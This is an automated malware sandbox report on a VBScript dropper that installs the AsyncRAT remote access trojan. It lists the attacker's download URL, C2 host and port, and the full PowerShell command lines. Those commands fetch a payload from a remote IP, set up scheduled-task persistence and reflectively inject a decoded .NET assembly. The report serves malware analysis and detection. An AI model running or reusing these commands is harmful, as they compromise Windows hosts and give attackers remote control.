Resubmissions

12/03/2024, 14:32

240312-rwjvaada89 10

12/03/2024, 14:27

240312-rsqhnach88 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
  • submitted
    12/03/2024, 14:32

General

  • Target

    g4.vbs

  • Size

    731B

  • MD5

    f82736dcca9ccf1e8460707f48f51478

  • SHA1

    2210fe31ae5e82413301a8e91bce03cf1eb14246

  • SHA256

    e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8

  • SHA512

    67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://104.243.44.136:777/moh.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

DOX_2024

C2

w3llsfarg0h0st.ddns.net:2244

Mutex

AsyncMutex_doxfofikdw32

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect ZGRat V1 2 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1120
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1292
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3652
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3668
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\install.js
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:468
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4592
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\run.js
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4408
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2744
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                7⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5068
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1612
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Users\Public\node.exe
      "C:\Users\Public\node.exe" C:\Users\Public\run.js
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1448
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
            PID:2660
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
            PID:880

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        e5ab5d093e49058a43f45f317b401e68

        SHA1

        120da069a87aa9507d2b66c07e368753d3061c2d

        SHA256

        4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

        SHA512

        d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        8a3a11baeb69c919d9e6a93ff4353155

        SHA1

        d926b5b919307fb37e39b94550c98922533e23e5

        SHA256

        052ccf5c0687f85f7eb792a6425134ca99308252992cb59862bc063d100bac9c

        SHA512

        c6f857e401490c2bbe5e6493e4834b89fa5b73909bf51c2c5aee8b26a456834cac32fe93a669646a8538cb1290673e875dfc2154bcf3a99117ef6bc6bfe3dda9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        2KB

        MD5

        c9431378551c6d63789f4bc499aef072

        SHA1

        70455c2f065fc4475f1e620defa3c60ed0444399

        SHA256

        820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452

        SHA512

        1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        3d5dc472de2b37146b21b63a3173176d

        SHA1

        7d3dd1e9a91c497745e965b4fdbbeac28196ab45

        SHA256

        75edb4ad9fc3331ff2d78383ae18095cb8163bdffaaa64e6593283bb7a17c3bb

        SHA512

        74bf3f56b6a31fb8745c27dd8a32a97c3923d08e76fb267ebf73bb9e7e901070ee2695437af17c4b4fad583a7591c454bd8cfd0fd7ef9e7b2691d1487f0cb1bb

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elsa5muu.rlm.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Public\Execute.dll

        Filesize

        56B

        MD5

        529cf04db0f736467c7583ea80c3aa66

        SHA1

        7628148337b1d3d700c8151f76a1595b6f5123b8

        SHA256

        67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

        SHA512

        f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

      • C:\Users\Public\Framework.dll

        Filesize

        520B

        MD5

        6a08392ecf95df7fc91917dcfaae8da6

        SHA1

        480f6a5c761e1a069c0d68f5ac2aabf727791393

        SHA256

        0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

        SHA512

        d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

      • C:\Users\Public\app.js

        Filesize

        385B

        MD5

        08a7e6db996774b6806c395c04116803

        SHA1

        d0182c34dacc8ab9c8841c8913a1ae7f4d281595

        SHA256

        9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc

        SHA512

        d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b

      • C:\Users\Public\basta.js

        Filesize

        377B

        MD5

        38affda935585ad2ddc0abe0a906f404

        SHA1

        8379070ec3e9b448499c53c6244c815bc566cf59

        SHA256

        f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa

        SHA512

        0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

      • C:\Users\Public\invoke.dll

        Filesize

        6B

        MD5

        b9376e9e3c4d48f5e35a3f355ae1f74a

        SHA1

        c65605adf5270f5065089b0189da542274d30db0

        SHA256

        90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

        SHA512

        5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

      • C:\Users\Public\load.dll

        Filesize

        4B

        MD5

        f19dbf2edb3a0bd74b0524d960ff21eb

        SHA1

        ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

        SHA256

        8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

        SHA512

        f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

      • C:\Users\Public\method.dll

        Filesize

        9B

        MD5

        38b97710070dbdd7b3359c0d52da4a72

        SHA1

        4ce08d2147c514f9c8e1f83d384369ec8986bc3b

        SHA256

        675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

        SHA512

        b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

      • C:\Users\Public\msg.dll

        Filesize

        123KB

        MD5

        55a2ab1987b5dc68a293d870ff989008

        SHA1

        e170596b7a86e216f23f9e0187e460447f63a88f

        SHA256

        c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64

        SHA512

        ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4

      • C:\Users\Public\node.bat

        Filesize

        3KB

        MD5

        f6a91f8aa7612ef8d9f2887fd909600a

        SHA1

        948ac8197a43a5e50ed34241f3d74bba0222b9c7

        SHA256

        dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3

        SHA512

        666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef

      • C:\Users\Public\run.js

        Filesize

        1KB

        MD5

        166e57b73fd399b0f54c415d22b235f6

        SHA1

        f20bf715826dc97a5e26c7acc4310d32213cc2b7

        SHA256

        f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3

        SHA512

        e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

      • C:\Users\Public\runpe.dll

        Filesize

        608KB

        MD5

        ab3151ce426cf5959813a90f452750b8

        SHA1

        271198005f634f22c0f84358a00b7aff302e712b

        SHA256

        a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578

        SHA512

        5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b

      • C:\Users\Public\shell.js

        Filesize

        387B

        MD5

        3c93270c5a82e51379c4eaa91cd697d5

        SHA1

        250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7

        SHA256

        825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c

        SHA512

        ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f

      • C:\Users\Public\type.dll

        Filesize

        7B

        MD5

        be784e48d0174367297b636456c7bcf1

        SHA1

        8c906d9e0e2439238b3263e087aee3d98fa86dea

        SHA256

        510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

        SHA512

        aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

      • C:\Users\Public\xx.dll

        Filesize

        72B

        MD5

        14c2a6b7bf15e15d8dae9cd4a56432d5

        SHA1

        0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

        SHA256

        79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

        SHA512

        e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

      • memory/880-145-0x0000000005640000-0x0000000005650000-memory.dmp

        Filesize

        64KB

      • memory/880-141-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/880-147-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1120-47-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1120-16-0x00000207D56A0000-0x00000207D56AA000-memory.dmp

        Filesize

        40KB

      • memory/1120-15-0x00000207D56D0000-0x00000207D56E2000-memory.dmp

        Filesize

        72KB

      • memory/1120-14-0x00000207D4920000-0x00000207D4930000-memory.dmp

        Filesize

        64KB

      • memory/1120-13-0x00000207D5640000-0x00000207D5654000-memory.dmp

        Filesize

        80KB

      • memory/1120-12-0x00000207D48E0000-0x00000207D4906000-memory.dmp

        Filesize

        152KB

      • memory/1120-0-0x00000207BC320000-0x00000207BC342000-memory.dmp

        Filesize

        136KB

      • memory/1120-11-0x00000207D4920000-0x00000207D4930000-memory.dmp

        Filesize

        64KB

      • memory/1120-10-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1448-139-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-124-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1448-125-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-126-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-137-0x000001BE69BA0000-0x000001BE69BF2000-memory.dmp

        Filesize

        328KB

      • memory/1448-138-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

        Filesize

        64KB

      • memory/1448-144-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/1612-117-0x0000000005150000-0x000000000515A000-memory.dmp

        Filesize

        40KB

      • memory/1612-122-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1612-123-0x0000000004D80000-0x0000000004D90000-memory.dmp

        Filesize

        64KB

      • memory/1612-121-0x0000000005E60000-0x0000000005EC6000-memory.dmp

        Filesize

        408KB

      • memory/1612-110-0x0000000000400000-0x0000000000416000-memory.dmp

        Filesize

        88KB

      • memory/1612-120-0x0000000006370000-0x000000000640C000-memory.dmp

        Filesize

        624KB

      • memory/1612-113-0x00000000753C0000-0x0000000075B70000-memory.dmp

        Filesize

        7.7MB

      • memory/1612-114-0x0000000004D80000-0x0000000004D90000-memory.dmp

        Filesize

        64KB

      • memory/1612-115-0x0000000005540000-0x0000000005AE4000-memory.dmp

        Filesize

        5.6MB

      • memory/1612-116-0x0000000005170000-0x0000000005202000-memory.dmp

        Filesize

        584KB

      • memory/3044-65-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3044-51-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3044-52-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

        Filesize

        64KB

      • memory/3044-53-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

        Filesize

        64KB

      • memory/3044-64-0x000001BA7FDC0000-0x000001BA7FDE6000-memory.dmp

        Filesize

        152KB

      • memory/3652-77-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

        Filesize

        64KB

      • memory/3652-79-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/3652-67-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

        Filesize

        64KB

      • memory/3652-66-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/5068-85-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB

      • memory/5068-92-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-86-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-108-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-107-0x000002286BC50000-0x000002286BCA2000-memory.dmp

        Filesize

        328KB

      • memory/5068-109-0x0000022869390000-0x00000228693A0000-memory.dmp

        Filesize

        64KB

      • memory/5068-112-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

        Filesize

        10.8MB